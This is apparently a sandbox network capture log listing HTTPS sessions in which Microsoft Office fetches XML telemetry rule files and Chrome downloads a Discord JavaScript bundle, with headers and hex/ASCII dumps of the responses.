                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 798eb064-701e-0021-422e-3c3d45000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201235Z-178bfbc474bfw4gbhC1NYCunf400000004yg00000000aahy
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    32192.168.2.54975413.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201235Z-174c587ffdfcj798hC1TEB9bq400000003n00000000062k3
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    33192.168.2.54975313.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 90548f26-b01e-0021-643a-3ccab7000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201235Z-178bfbc474btvfdfhC1NYCa2en000000052g000000005kqe
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    34192.168.2.54975513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 428
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                    x-ms-request-id: a72cf994-301e-0099-6e45-3c6683000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201235Z-178bfbc474bnwsh4hC1NYC2ubs000000050000000000b56n
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    35192.168.2.54975613.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 499
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 8157cc8d-f01e-0003-1961-3b4453000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201237Z-178bfbc474bwlrhlhC1NYCy3kg0000000510000000002z2r
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    36192.168.2.549761162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC684OUTGET /assets/webMinimal.3d98e446c302b2b42423.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC961INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 13439139
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0aea9e142fe-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "a4da9a05edcc0a143cfb01e6a2ea6c82"
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:15 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jsUkiLchum%2Fuf23w84turenIpbsR0pnYYpPiZqZhEbepYDJC2ITbLQk9x9t7YPAb8lrck09hihz6WHEhbnldzk9Mh6NyYG1t2ZozQlELX8DWtSiQEw1dn2lf24ZU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC408INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 35 39 35 31 37 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 32 30 31 37 2d 31 31 2d 31 36 2e 6d 70 34 22 3a 22 32 32 31 38 32 35 22 2c 22 2e 2f 63 68 61 6e 6e 65 6c 2d 66 6f 6c 6c 6f 77 69 6e 67 2e 70 6e 67 22 3a 22 32 34 37 38 31 35 22 2c 22 2e 2f 64 69 73 63 6f 76 65 72 79 2e 6a 70 67 22 3a 22 37 37 38 36 30 38 22 2c 22 2e 2f 67 32 35 30 6b 2d 63 6c 2e 6d 70 34 22 3a 22 39 30 39 38 35 31 22 2c 22 2e 2f 68 79 70 65 73 71 75 61 64 2d 68 61 63 6b 2d 77 65 65 6b 2f 68 65 61 64 65 72 2e 70 6e 67 22 3a 22 38 31 39 30 39 31 22 2c 22 2e 2f 68 79 70 65 73 71 75 61 64 2d 68 61 63 6b 2d 77 65 65 6b 2f 70 61 6c 61 64 69 6e 73 2d 6c 6f 6f 74 2e 70 6e 67 22 3a 22 37 34 32 33 30 35 22 2c 22
                                                                                                                                                                                                                                                                                    Data Ascii: (()=>{var e={595173:function(e,t,n){var r={"./2017-11-16.mp4":"221825","./channel-following.png":"247815","./discovery.jpg":"778608","./g250k-cl.mp4":"909851","./hypesquad-hack-week/header.png":"819091","./hypesquad-hack-week/paladins-loot.png":"742305","
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 73 74 69 63 6b 65 72 73 2d 6c 61 75 6e 63 68 2f 32 30 32 30 5f 50 4d 4d 5f 53 54 49 43 4b 45 52 53 5f 4d 72 6b 74 5f 42 6c 6f 67 48 64 72 5f 32 35 30 30 78 31 30 30 30 2e 70 6e 67 22 3a 22 39 32 38 34 30 30 22 2c 22 2e 2f 73 74 69 63 6b 65 72 73 2d 6c 61 75 6e 63 68 2f 32 30 32 30 5f 50 4d 4d 5f 53 54 49 43 4b 45 52 53 5f 4d 72 6b 74 5f 44 65 73 6b 74 6f 70 48 65 72 6f 5f 4c 65 66 74 5f 31 38 30 78 32 32 30 2e 70 6e 67 22 3a 22 31 34 38 38 32 31 22 2c 22 2e 2f 73 74 69 63 6b 65 72 73 2d 6c 61 75 6e 63 68 2f 32 30 32 30 5f 50 4d 4d 5f 53 54 49 43 4b 45 52 53 5f 4d 72 6b 74 5f 44 65 73 6b 74 6f 70 48 65 72 6f 5f 52 69 67 68 74 5f 31 38 30 78 32 32 30 2e 70 6e 67 22 3a 22 39 38 32 35 36 33 22 2c 22 2e 2f 73 74 69 63 6b 65 72 73 2d 6c 61 75 6e 63 68 2f 32 30
                                                                                                                                                                                                                                                                                    Data Ascii: stickers-launch/2020_PMM_STICKERS_Mrkt_BlogHdr_2500x1000.png":"928400","./stickers-launch/2020_PMM_STICKERS_Mrkt_DesktopHero_Left_180x220.png":"148821","./stickers-launch/2020_PMM_STICKERS_Mrkt_DesktopHero_Right_180x220.png":"982563","./stickers-launch/20
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 3b 74 68 72 6f 77 20 74 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 74 7d 72 65 74 75 72 6e 20 72 5b 65 5d 7d 69 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 7d 2c 69 2e 72 65 73 6f 6c 76 65 3d 61 2c 65 2e 65 78 70 6f 72 74 73 3d 69 2c 69 2e 69 64 3d 22 31 34 38 36 36 30 22 7d 2c 35 37 37 33 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 69 6d 67 5f 70 72 65 6d 69 75 6d 5f 65 6d 6f 6a 69 5f 64 61 72 6b 2e 73 76 67 22 3a 22 33 34 31 30 34 38 22 2c 22 2e 2f 69 6d 67 5f 70 72 65 6d 69 75 6d 5f 65 6d 6f 6a 69 5f 6c 69 67 68 74
                                                                                                                                                                                                                                                                                    Data Ascii: or("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return r[e]}i.keys=function(){return Object.keys(r)},i.resolve=a,e.exports=i,i.id="148660"},577391:function(e,t,n){var r={"./img_premium_emoji_dark.svg":"341048","./img_premium_emoji_light
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 2d 32 32 2e 70 6e 67 22 3a 22 38 39 39 35 36 35 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 61 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 69 66 28 21 6e 2e 6f 28 72 2c 65 29 29 7b 76 61 72 20 74 3d 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 3b 74 68 72 6f 77 20 74 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 74 7d 72 65 74 75 72 6e 20 72 5b 65 5d 7d 69 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 7d 2c 69 2e 72 65 73 6f 6c 76 65 3d 61 2c 65 2e 65 78 70 6f 72 74 73 3d 69 2c 69 2e 69 64 3d 22 37 33 35 38 30 30 22 7d 2c 36 30 34 39 30 31 3a 66 75 6e 63
                                                                                                                                                                                                                                                                                    Data Ascii: -22.png":"899565"};function i(e){return n(a(e))}function a(e){if(!n.o(r,e)){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return r[e]}i.keys=function(){return Object.keys(r)},i.resolve=a,e.exports=i,i.id="735800"},604901:func
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 69 6e 67 69 6e 67 2e 6d 70 33 22 3a 22 36 31 32 33 36 33 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 64 65 61 66 65 6e 2e 6d 70 33 22 3a 22 35 37 38 31 34 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 64 65 66 65 61 6e 2e 6d 70 33 22 3a 22 38 31 39 30 39 38 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 64 69 73 63 6f 6e 6e 65 63 74 2e 6d 70 33 22 3a 22 33 38 32 34 37 32 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 6d 65 73 73 61 67 65 31 2e 6d 70 33 22 3a 22 37 37 32 36 33 37 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 6d 75 74 65 2e 6d 70 33 22 3a 22 35 33 39 37 31 36 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 75 6e 64 65 61 66 65 6e 2e 6d 70 33 22 3a 22 32 35 37 31 33 30 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 75 6e 64 65 66 65 61 6e 2e 6d 70 33
                                                                                                                                                                                                                                                                                    Data Ascii: inging.mp3":"612363","./halloween_deafen.mp3":"57814","./halloween_defean.mp3":"819098","./halloween_disconnect.mp3":"382472","./halloween_message1.mp3":"772637","./halloween_mute.mp3":"539716","./halloween_undeafen.mp3":"257130","./halloween_undefean.mp3
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 69 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 61 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 69 66 28 21 6e 2e 6f 28 72 2c 65 29 29 7b 76 61 72 20 74 3d 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 3b 74 68 72 6f 77 20 74 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 74 7d 72 65 74 75 72 6e 20 72 5b 65 5d 7d 69 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 7d 2c 69 2e 72 65 73 6f 6c 76 65 3d 61 2c 65 2e 65 78 70 6f 72 74 73 3d 69 2c 69 2e 69 64 3d 22 34 35 31 33 34 33 22 7d 2c 36 39 32 34 32 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 63 68 61 6d 70 69
                                                                                                                                                                                                                                                                                    Data Ascii: i(e){return n(a(e))}function a(e){if(!n.o(r,e)){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return r[e]}i.keys=function(){return Object.keys(r)},i.resolve=a,e.exports=i,i.id="451343"},692425:function(e,t,n){var r={"./champi
